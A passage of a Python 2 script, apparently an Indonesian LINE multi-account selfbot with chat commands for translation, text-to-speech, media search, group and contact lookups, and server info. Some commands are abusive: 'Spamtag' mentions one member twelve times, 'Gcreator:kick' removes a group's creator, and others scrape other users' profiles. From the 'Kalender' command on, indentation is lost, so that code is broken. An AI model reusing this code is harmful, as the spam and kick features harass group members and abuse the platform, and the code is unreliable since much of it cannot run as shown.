    bahasa_tujuan = 'id'
    kata = msg.text.replace("Ar@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
    # Indonesian -> Korean.
    bahasa_awal = 'id'
    bahasa_tujuan = 'ko'
    kata = msg.text.replace("Id@ko ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
    # Korean -> Indonesian.
    bahasa_awal = 'ko'
    bahasa_tujuan = 'id'
    kata = msg.text.replace("Ko@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
#==========================[WIB]===========================
elif msg.text in ["welcome","Welcome","kam","Kam"]:
    # Send a welcome text + spoken (TTS) greeting and name the group creator.
    ginfo = kr1.getGroup(msg.to)
    kr1.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
    jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
    kr1.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
    tts = gTTS(text=jawaban1, lang='id')
    tts.save('tts.mp3')
    kr1.sendAudio(msg.to,'tts.mp3')
#==========================[WIB]===========================
# The "Say-*" family speaks the given text via Google TTS in the chosen
# language, reusing a local "hasil.mp3" file each time.
elif "Say-id " in msg.text:
    say = msg.text.replace("Say-id ","")
    lang = 'id'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
    say = msg.text.replace("Say-en ","")
    lang = 'en'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
    say = msg.text.replace("Say-jp ","")
    lang = 'ja'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
    say = msg.text.replace("Say-ar ","")
    lang = 'ar'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
    say = msg.text.replace("Say-ko ","")
    lang = 'ko'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    kr1.sendAudio(msg.to,"hasil.mp3")
#==========================[WIB]===========================
elif "Kapan " in msg.text:
    # "When ...?" joke: pick a random canned answer, speak it, then send it
    # three times (once from kr1, twice from kr2).
    tanya = msg.text.replace("Kapan ","")
    jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
    jawaban = random.choice(jawab)
    tts = gTTS(text=jawaban, lang='id')
    tts.save('tts.mp3')
    kr1.sendAudio(msg.to,'tts.mp3')
    kr1.sendText(msg.to,jawaban)
    kr2.sendText(msg.to,jawaban)
    kr2.sendText(msg.to,jawaban)
#==========================[WIB]===========================
elif "Apakah " in msg.text:
    # "Is it ...?" joke: same pattern with yes/no style answers.
    tanya = msg.text.replace("Apakah ","")
    jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
    jawaban = random.choice(jawab)
    tts = gTTS(text=jawaban, lang='id')
    tts.save('tts.mp3')
    kr1.sendAudio(msg.to,'tts.mp3')
    kr1.sendText(msg.to,jawaban)
    kr2.sendText(msg.to,jawaban)
    kr2.sendText(msg.to,jawaban)
#==========================[WIB]===========================
elif msg.text in ["Nah","nah"]:
    # Call-and-response gag: reply "Kan" three times.
    kr1.sendText(msg.to,"Kan")
    kr1.sendText(msg.to,"Kan")
    kr1.sendText(msg.to,"Kan")
#==========================[WIB]===========================
elif msg.text in ["Absen","absen"]:
    # Admin: roll call -- each bot account reports in.
    if msg.from_ in admin:
        kr1.sendText(msg.to,"👉★★★√")
        kr2.sendText(msg.to,"👉★★★★√")
        kr3.sendText(msg.to,"👉★★★★★√")
        kr1.sendText(msg.to,"👉Semua Hadir Boss...!!!")
#==========================[WIB]===========================
elif "Bcast " in msg.text:
    # Owner: decorated broadcast to every joined group.
    if msg.from_ in owner:
        bc = msg.text.replace("Bcast ","")
        gid = kr1.getGroupIdsJoined()
        for i in gid:
            kr1.sendText(i,"●▬▬▬▬ஜ۩[BROADCAST]۩ஜ▬▬▬▬●\n\n"+bc+"\n\n#BROADCAST!!")
#==========================[WIB]===========================
elif 'Youtube ' in msg.text:
    # Scrape the first YouTube search result and send it as a video.
    #if msg.from_ in admin:
    try:
        textToSearch = (msg.text).replace('Youtube ', "").strip()
        query = urllib.quote(textToSearch)
        url = "https://www.youtube.com/results?search_query=" + query
        response = urllib2.urlopen(url)
        html = response.read()
        soup = BeautifulSoup(html, "html.parser")
        results = soup.find(attrs={'class': 'yt-uix-tile-link'})
        ght = ('https://www.youtube.com' + results['href'])
        kr1.sendVideoWithURL(msg.to, ght)
    except:
        kr1.sendText(msg.to, "Could not find it")
elif "Yt " in msg.text:
    # List YouTube search results (title + URL), skipping playlist links.
    #if msg.from_ in admin:
    query = msg.text.replace("Yt ","")
    with requests.session() as s:
        s.headers['user-agent'] = 'Mozilla/5.0'
        url = 'http://www.youtube.com/results'
        params = {'search_query': query}
        r = s.get(url, params=params)
        soup = BeautifulSoup(r.content, 'html5lib')
        hasil = ""
        for a in soup.select('.yt-lockup-title > a[title]'):
            if '&list=' not in a['href']:
                hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
        kr1.sendText(msg.to,hasil)
        print '[Command] Youtube Search'
#==========================[WIB]===========================
elif "Lirik " in msg.text:
    # Look up song lyrics via the joox proxy API and send them.
    #if msg.from_ in admin:
    try:
        songname = msg.text.lower().replace("Lirik ","")
        params = {'songname': songname}
        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
        data = r.text
        data = json.loads(data)
        for song in data:
            hasil = 'Lyric Lagu ('
            hasil += song[0]
            hasil += ')\n\n'
            hasil += song[5]
            kr1.sendText(msg.to, hasil)
    except Exception as wak:
        kr1.sendText(msg.to, str(wak))
#==========================[WIB]===========================
elif "Wikipedia " in msg.text:
    # Send the Indonesian Wikipedia title, one-sentence summary and URL;
    # on failure (e.g. text too long) fall back to just the URL.
    #if msg.from_ in admin:
    try:
        wiki = msg.text.lower().replace("Wikipedia ","")
        wikipedia.set_lang("id")
        pesan="Title ("
        pesan+=wikipedia.page(wiki).title
        pesan+=")\n\n"
        pesan+=wikipedia.summary(wiki, sentences=1)
        pesan+="\n"
        pesan+=wikipedia.page(wiki).url
        kr1.sendText(msg.to, pesan)
    except:
        try:
            pesan="Over Text Limit! Please Click link\n"
            pesan+=wikipedia.page(wiki).url
            kr1.sendText(msg.to, pesan)
        except Exception as e:
            kr1.sendText(msg.to, str(e))
#==========================[WIB]===========================
elif "Music " in msg.text:
    # Look up a song via the joox proxy API; send its info then the audio.
    #if msg.from_ in admin:
    try:
        songname = msg.text.lower().replace("Music ","")
        params = {'songname': songname}
        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
        data = r.text
        data = json.loads(data)
        for song in data:
            hasil = 'This is Your Music\n'
            hasil += 'Judul : ' + song[0]
            hasil += '\nDurasi : ' + song[1]
            hasil += '\nLink Download : ' + song[4]
            kr1.sendText(msg.to, hasil)
            kr1.sendText(msg.to, "Please Wait for audio...")
            kr1.sendAudioWithURL(msg.to, song[4])
    except Exception as njer:
        kr1.sendText(msg.to, str(njer))
#==========================[WIB]===========================
elif "Image " in msg.text:
    # Google-image scrape: pick a random result and send it.
    #if msg.from_ in admin:
    search = msg.text.replace("Image ","")
    url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
    raw_html = (download_page(url))
    items = []
    items = items + (_images_get_all_items(raw_html))
    path = random.choice(items)
    print path
    try:
        kr1.sendImageWithURL(msg.to,path)
    except:
        pass
#==========================[WIB]===========================
elif "Instagram " in msg.text:
    # Fetch an Instagram profile via the ?__a=1 JSON endpoint and send the
    # avatar plus a summary of the account's stats.
    #if msg.from_ in admin:
    try:
        instagram = msg.text.replace("Instagram ","")
        response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
        data = response.json()
        namaIG = str(data['user']['full_name'])
        bioIG = str(data['user']['biography'])
        mediaIG = str(data['user']['media']['count'])
        verifIG = str(data['user']['is_verified'])
        usernameIG = str(data['user']['username'])
        followerIG = str(data['user']['followed_by']['count'])
        profileIG = data['user']['profile_pic_url_hd']
        privateIG = str(data['user']['is_private'])
        followIG = str(data['user']['follows']['count'])
        link = "Link: " + "https://www.instagram.com/" + instagram
        text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
        kr1.sendImageWithURL(msg.to, profileIG)
        kr1.sendText(msg.to, str(text))
    except Exception as e:
        kr1.sendText(msg.to, str(e))
#==========================[WIB]===========================
elif "Kelahiran " in msg.text:
    # Birth-date lookup via a Google Apps Script API: age, next birthday,
    # and zodiac for the given date.
    #if msg.from_ in admin:
    tanggal = msg.text.replace("Kelahiran ","")
    r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
    data=r.text
    data=json.loads(data)
    lahir = data["data"]["lahir"]
    usia = data["data"]["usia"]
    ultah = data["data"]["ultah"]
    zodiak = data["data"]["zodiak"]
    kr1.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
#==========================[WIB]===========================
elif msg.text in ["Kalender"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr1.sendText(msg.to, rst)
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["ifconfig"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text in ["system"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text in ["kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text in ["cpu"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
#==========================[WIB]===========================
elif "Restart" in msg.text:
if msg.from_ in owner:
print "[Command]Restart"
try:
kr1.sendText(msg.to,"Restarting...")
kr1.sendText(msg.to,"Restart Success")
restart_program()
except:
kr1.sendText(msg.to,"Please wait")
restart_program()
pass
#==========================[WIB]===========================
elif "Kr turn off" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["runtime","Runtime"]:
if msg.from_ in admin:
eltime = time.time() - mulai
van = "【ωเɓ-ɓσƭ ૨µɳเɳɠ】\n🔹️ ɓσƭ เร αℓ૨εα∂ყ ૨µɳเɳɠ ƒσ૨:\n"+waktu(eltime)
kr1.sendText(msg.to,van)
#==========================[WIB]===========================
elif msg.text in ["Wib kemari"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
gid = kr2.getGroupIdsJoined()
gid = kr3.getGroupIdsJoined()
for i in gid:
kr1.sendText(i,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
kr1.leaveGroup(i)
kr2.leaveGroup(i)
kr3.leaveGroup(i)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
else:
kr1.sendText(msg.to,"He declined all invitations")
#==========================[WIB]===========================
#==========================[WIB]===========================
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "Friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
gna = kr1.getContact(i)
if h == suf:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif "Checkmid: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
kr1.sendMessage(msg)
contact = kr1.getContact(saya)
cu = kr1.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
kr1.sendImageWithURL(msg.to,image)
kr1.sendText(msg.to,"Cover " + contact.displayName)
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif "Checkid: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace("Checkid: ","")
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).id
group = kr1.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
kr1.sendMessage(msg)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
#==========================[WIB]===========================
elif msg.text in ["Friendlist"]:
if msg.from_ in owner:
contactlist = kr1.getAllContactIds()
kontak = kr1.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Memlist"]:
if msg.from_ in owner:
kontak = kr1.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif "Friendinfo: " in msg.text:
if msg.from_ in owner:
saya = msg.text.replace('Friendinfo: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
contact = kr1.getContact(i)
cu = kr1.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
kr1.sendImageWithURL(msg.to,image)
kr1.sendText(msg.to,"Cover " + contact.displayName)
kr1.sendImageWithURL(msg.to,path)
#==========================[WIB]===========================
elif "Friendpict: " in msg.text:
if msg.from_ in owner:
saya = msg.text.replace('Friendpict: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
gna = kr1.getContact(i)
if h == saya:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif msg.text in ["Friendlistmid"]:
if msg.from_ in owner:
gruplist = kr1.getAllContactIds()
kontak = kr1.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Blocklist"]:
if msg.from_ in admin:
blockedlist = kr1.getBlockedContactIds()
kontak = kr1.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Gruplist"]:
if msg.from_ in admin:
gruplist = kr1.getGroupIdsJoined()
kontak = kr1.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Gruplistmid"]:
if msg.from_ in owner:
gruplist = kr1.getGroupIdsJoined()
kontak = kr1.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif "Grupimage: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupimage: ','')
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).name
gna = kr1.getGroup(i)
if h == saya:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif "Grupname" in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupname','')
gid = kr1.getGroup(msg.to)
kr1.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
#==========================[WIB]===========================
elif "Grupid" in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupid','')
gid = kr1.getGroup(msg.to)
kr1.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
#==========================[WIB]===========================
elif "Grupinfo: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace('Grupinfo: ','')
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).name
group = kr1.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
kr1.sendMessage(msg)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
print "Spamtag Berhasil."
#==========================[WIB]===========================
elif "playstore " in msg.text.lower():
#if msg.from_ in admin:
tob = msg.text.lower().replace("playstore ","")
kr1.sendText(msg.to,"Sedang Mencari boss...")
kr1.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
kr1.sendText(msg.to,"Ketemu boss ^")
#==========================[WIB]===========================
elif 'wikipedia ' in msg.text.lower():
#if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except Exception as e:
kr1.sendText(msg.to, str(e))
          #==========================[WIB]===========================
elif "say " in msg.text.lower():
#if msg.from_ in admin:
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
#==========================[WIB]===========================
elif msg.text in ["Gift 8","Gift8","gift8"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
kr1.sendMessage(msg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
kr1.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = kr1.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr1.findAndAddContactsByMid(gCreator)
kr1.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = kr1.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
kr1.findAndAddContactsByMid(gCreator)
kr1.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#==========================[WIB]===========================
elif 'lirik ' in msg.text.lower():
#if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr1.sendText(msg.to, hasil)
except Exception as wak:
kr1.sendText(msg.to, str(wak))
#==========================[WIB]===========================
elif "Getcover @" in msg.text:
#if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr2.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
cu = kr1.channel.getCover(target)
path = str(cu)
kr1.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#==========================[WIB]===========================
elif "Idline: " in msg.text:
#if msg.from_ in admin:
msgg = msg.text.replace('idline: ','')
conn = kr1.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
kr1.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "reinvite" in msg.text.split():
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
kr1.findAndAddContactsByMid(msg.to, grCans)
kr1.cancelGroupInvitation(msg.to, grCans)
kr1.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"No Invited")
else:
kr1.sendText(msg.to,"Error")
else:
pass
          #==========================[WIB]===========================
elif msg.text in ["Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr1.sendText(msg.to, rst)
          #==========================[WIB]===========================
elif "Image " in msg.text:
#if msg.from_ in admin:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
